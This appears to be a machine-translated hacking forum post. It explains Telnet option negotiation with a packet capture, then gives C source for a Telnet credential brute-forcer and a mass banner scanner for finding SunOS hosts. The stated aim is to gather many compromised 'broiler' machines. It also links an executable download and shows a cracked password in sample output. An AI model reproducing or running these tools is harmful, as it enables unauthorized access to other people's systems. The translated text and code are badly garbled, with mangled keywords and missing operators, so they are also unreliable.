The so-called attack on Telnet does not focus on Telnet's user susceptibility and overflow for Telnet service process. In addition to these, I think Telnet does not have too much problem .Telnet connection is not as simple as everyone imagined, although there is no Encryption like SSH, but it is still more complicated than FTP.
D:> Telnet 192.168.25.1
Red Hat Linux Release 7.3 (Valhalla)
KERNEL 2.4.18-3 on AN i686
Login: Chi
Password: xxxxxxx
Last login: Mon Feb 24 13:43:30 from 192.168.25.1
[CHI @ chi chi] $
Now let's know a little about Telnet! The purpose of Telnet Protocol is to provide a relatively universal, two-way, an eight-bit byte communication method. Its main goal is to allow the standard method of the interface terminal device and the interaction of the terminal. It can be foreseen that can also be used to communicate with the terminal to the terminal to process communication (distributed calculation).
A Telnet connection is a transfer data for transmitting control protocols. The Telnet protocol is based on the following three basis:
1. Network virtual terminal concept;
When a Telnet connection is established, each end is assumed to use a network virtual terminal, that is, NVT. NVT is a representative of an imaginary standard device universal device. This eliminates the characteristics of the "server" and "user" machine to understand the other machine terminal, and the terminal can directly handle the conversation.
2. Method for dialogue options;
Based on dialog-based connections. They use the "Do, Don't, Will, WON n't" structure to allow user machines and servers to establish a more intricate Telnet session connection. This option includes changing a character set, a response mode, and more. The basic policy for setting options is that either party is initialized to request a request to take effect. The other party can accept it or reject this request. If the request is accepted, this option takes effect immediately; if it is rejected, the connection still maintains the basic NVT connection properties.
3. Coordination of terminals and processing;
At the end, set the hardware to abandon control at each line. When this happens, the local computer handles input data and determines whether or not, if not, the control is sent back to the terminal. If an output is required, the computer will hold control power until the output data is sent. The difficulty of using this terminal on the network is obvious. Here is
Coordination has high requirements.
All telnet command structures include at least one two bytes: followed by an IAC. The command to the option session is composed of three bytes, and the third byte is a reference to the option. The following is the defined telnet command.
................................................ ................................................ ....................
SE 240 end sub-session parameters.
NOP 241 has no operation.
Data Mark 242 Synch's data stream portion. This should always be sent together with the TCP emergency sign.
BREAK 243 NVT character brk.
Interrupt Process 244 IP function.
Abort Output 245 AO function.
Are you there 246 ayt function.
ERASE Character 247 EC function.
ERASE Character 247 EL function.
Go Ahead 249 The GA signal.
SB 250 indicates that the following is a sub-dialog that indicates an option.
Will (Option Code) 251 indicates that you want to start execution, or confirm that the option is now operating the indication.
WON't (Option Code) 252 indicates the option to refuse to execute or continue the reference. Do (Option Code) 253 indicates that the other party is executed or confirmed to see the option to execute the instructions.
DON't (Option Code) 254 indicates that the other party stops execution, or a diagnosis requires the other party to stop executing the instructions.
Iac 255 data byte 255
................................................ ................................................ ..........................
We use Sniffer to track Telnet's landing process.
9. IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.391, 66,
Telnet
Command: Do Terminal-Type
Command: Do Terminal-Speed
Command: Do X-Display-Location
Command: do new-environ
10, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 60,
Telnet
Command: Will Terminal-Type
Command: Will Naws
13, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 63,
Telnet
Command: Won't Terminal-Speed
Command: Won't X-Display-Location
Command: Won't new-environ
18, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 63,
Telnet
Command: do naws
Command: SB Terminal-Type
Command: EB
26, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 66,
Telnet
Command: Will Suppress-Go-ahead
Command: do echo
Command: Will Status
Command: Do Toggle-Flow-Control
31, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 63,
Telnet
Command: Will Echo
Command: don't status
Command: WON 'Toggle-Flow-Control
34, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.040, 126, telnet
Command: don't echo
Command: Will Echo
Data: Red Hat Linux Release 7.3 (Valhalla)
(Note that Banner received here)
35, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 57,
Telnet
Command: Won't echo
36, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 61,
Telnet
Data: Login:
(Receiving login bytes)
39, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 57,
Telnet
Command: do echo
(You can send your username here)
62, IP / TCP, 00:01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 56,
Telnet
Data:
67, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 64,
Telnet
Data: Password:
(Receive Password bytes and verify the password)
97, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 468.25.1 => 192.168.25.3, 3225 => 23, 0.220, 56,
Telnet
Data:
(Send is completed, if success will return the situation below)
104, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 105,
Telnet
Data: Last Login: Thu Feb 27 10:06:16 from 192.168.25.1
For Telnet, the successful landing is over here, and you can write a guess for the Telnet username by pressing the previous process!
/ ************************************************** *************************************** /
/ * Below this is my Telnet User Check I wrote about Red Hat 7.3, you can do anything, as long as you change it, you can change * / # include
#include
#include
#include
#include
#include
#include
#define port 23
#define max 1024
Main (int Argc, char * argv [])
{
File * userfile;
File * passfile;
File * ipfile;
CHAR User [1024];
Char Pass [1024];
CHAR SCAN_IP [1024];
IF (Argc <4)
{
USAGE (Argv [0]);
Exit (1);
}
IF ((IPFile = FOPEN (Argv [3], "R") == null) {
Printf ("could not read the ipfile / n");
EXIT (2);
}
While (fscanf (ipfile, "% s", & scan_ip)! = EOF)
{
IF ((Userfile = FOPEN (Argv [1], "R") == null) {
Printf ("Could Not Read The InputFile / N);
EXIT (2);
}
While (fscanf (userfile, "% s", & user)! = EOF)
{
IF ((Passfile = FOPEN (Argv [2], "R")) == null) {
Printf ("Could Not Creat The OutputFile / N");
EXIT (2);
}
While (fscanf (Passfile, "% s", & pass)! = EOF)
{
Telnet_banner (Scan_IP, User, Pass);
}
}
}
Exit (1);
}
INT usage (char * pro)
{
Printf ("Welcome to www.9836.com / n");
Printf ("USAGE:% s
exit (0);
}
Telnet_banner (char * ip, char * check_user, char * check_pass)
{
Struct SockAddr_in Addr;
U_CHAR BUF [MAX];
Int Sock, Size, I = 0;
IF ((SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
Printf ("Socket Failt");
Exit (1);
}
Addr.sin_Family = AF_INET;
Addr.sin_Port = HTONS (port);
Addr.sin_addr.s_addr = inet_addr (ip);
IF (Connect (STRUCK, STRUCKADDR *) & Addr, SizeOf (AddR)) == -1) {
Printf ("Connect Failt"); exit (1);
}
While (i <10) {
Read (SOCK, BUF, 1);
IF (* buf == 255) / * Iac * /
Read (SOCK, (BUF 1), 2);
IF (* (BUF 1) == 253) / * Is DO * /
{
* (BUF 1) = 252;
Write (SOCK, BUF, 3); / * Send WON '' * /
}
i ;
}
IF (* buf! = 0) {
Bzero (BUF, SIZEOF (BUF));
Read (Sock, BUF, SIZEOF (BUF)); / * Read Telnet Banner * /
Printf ("% s", buf);
}
Bzero (BUF, SIZEOF (BUF));
Read (Sock, BUF, SIZEOF (BUF)); / * login * /
* (BUF 0) = 255;
* (BUF 1) = 253;
* (BUF 2) = 0x01;
Write (Sock, BUF, 3); / * IAC Do Echo * /
Write (sock, check_user, sizeof (check_user)); / * Send a username * /
* (BUF 0) = 0x0d;
* (BUF 1) = 0x0a;
Write (SOCK, BUF, 2); / *
Read (Sock, BUF, SIZEOF (BUF);
Read (Sock, BUF, SIZEOF (BUF)); / * password byte * /
Write (sock, check_pass, sizeof (check_pass) 3); / * Send password * /
* (BUF 0) = 0x0d;
* (BUF 1) = 0x0a;
Write (SOCK, BUF, 2); / *
Read (Sock, BUF, SIZEOF (BUF)); / * Read Election * /
Printf ("% s", buf);
IF (strstr (buf, "from")! = null) / * Judgment * /
{
Printf ("/ NUSER% S IS FOUND, Password IS% S / N", Check_user, Check_pass;
}
Close (SOCK);
}
/ ************************************************** *********************************************** /
Use results:
E: / cygwin / home / chi> telnet user.txt pass.txt ip.txt
Red Hat Linux Release 7.3 (Valhalla)
KERNEL 2.4.18-3 on AN i686
Last Login: Thu Feb 27 20:07:49 from 192.168.25.3
User chi is found, password is 2211wen
Red Hat Linux Release 7.3 (Valhalla)
KERNEL 2.4.18-3 on AN i686
SSWORD: Red Hat Linux Release 7.3 (Valhalla)
KERNEL 2.4.18-3 on AN i686
Ssword: Red Hat Linux Release 7.3 (Valhalla) kernel 2.4.18-3 on AN i686
SSWORD: Red Hat Linux Release 7.3 (Valhalla)
KERNEL 2.4.18-3 on AN i686
SSWORD: Red Hat Linux Release 7.3 (Valhalla)
KERNEL 2.4.18-3 on AN i686
Ssword:
E: / cygwin / home / chi>
In addition to the telnet user's susceptibility, only the overflow of the Telnet service or Telnet process! Telnet's login actually used the login file, everyone is not thinking of rootkit,
There are still many hosts that have not been supplemented by SunOS-Telnet vulnerabilities! As for the use of Sunos-Telnet, I don't say it! I only summarize the way to get a large number of broilers!
When SunOS's basic installation, I opened Telnet, so most SunOS hosts did not deliberately change his Banner, so Telnet's banner is very important to us!
Mr. open SuperScan, scan a large area and scan 111 or 22, which is the difference between the UNIX machine and the Windows port, so that the point of Windows hosts, then, save the list you sweep, and import Superscan again, this time Scanning is a 23-port. The host has not been omitted! However, filtering SuperScan's IP list and turns into a list of pure IPs! [You need the program here] http://9836.com/software/file.exe]
Next is the scan of Telnet Banner! Didn't forget this above the program, I have changed it into Telnet Banner Check, not the user's scan!
/ ************************************************** **************************************************** /
#include
#include
#include
#include
#include
#include
#include
#define port 23
#define max 1024
File * Output;
Main (int Argc, char * argv [])
{
FILE * INPUT;
File * ipfile;
CHAR SCAN_IP [1024];
IF (Argc <3)
{
USAGE (Argv [0]);
Exit (1);
}
IF (argc == 3) {
IF ((output = fopen (argv [2], "wb")) == null) {
Printf ("Could Not Creat The OutputFile / N");
EXIT (2);
}
IF ((INPUT = FOPEN (Argv [1], "R") == null) {
Printf ("Could Not Read The InputFile / N);
EXIT (2);
}
}
While (FSCANF (INPUT, "% s", & scan_ip)! = EOF) {
Telnet_banner (Scan_IP, Argv [3]);
}
Exit (1);
}
INT usage (char * pro)
{
Printf ("Welcome to www.9836.com / n");
Printf ("USAGE:% S
exit (0);
}
Telnet_banner (char * ip, char * TIMES)
{
Struct SockAddr_in Addr;
U_CHAR BUF [MAX];
Int Sock, Size, I = 0;
IF ((SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
Printf ("Socket Failt");
Exit (1);
}
Addr.sin_Family = AF_INET;
Addr.sin_Port = HTONS (port);
Addr.sin_addr.s_addr = inet_addr (ip);
IF (Connect (STRUCK, STRUCKADDR *) & Addr, SizeOf (AddR)) == -1) {
Printf ("CONNECT FAILT");
Exit (1);
}
While (i <10) {
Read (SOCK, BUF, 1);
IF (* buf == 255) {
Read (SOCK, (BUF 1), 2);
}
IF (* (BUF 1) == 253)
{
* (BUF 1) = 252;
Write (SOCK, BUF, 3);
}
i ;
}
IF (* buf! = 0) {
Bzero (BUF, SIZEOF (BUF));
Read (Sock, BUF, SIZEOF (BUF);
Printf ("% s", buf);
IF (strstr (buf, "sunos")! = null)
{
* (BUF 14) = 0;
FPRINTF (Output, "% s", buf);
FPUTS (IP, OUTPUT);
}
}
Close (SOCK);
}
/ ************************************************** *********************************************************** *** /
Please teach more, thank you for helping me.
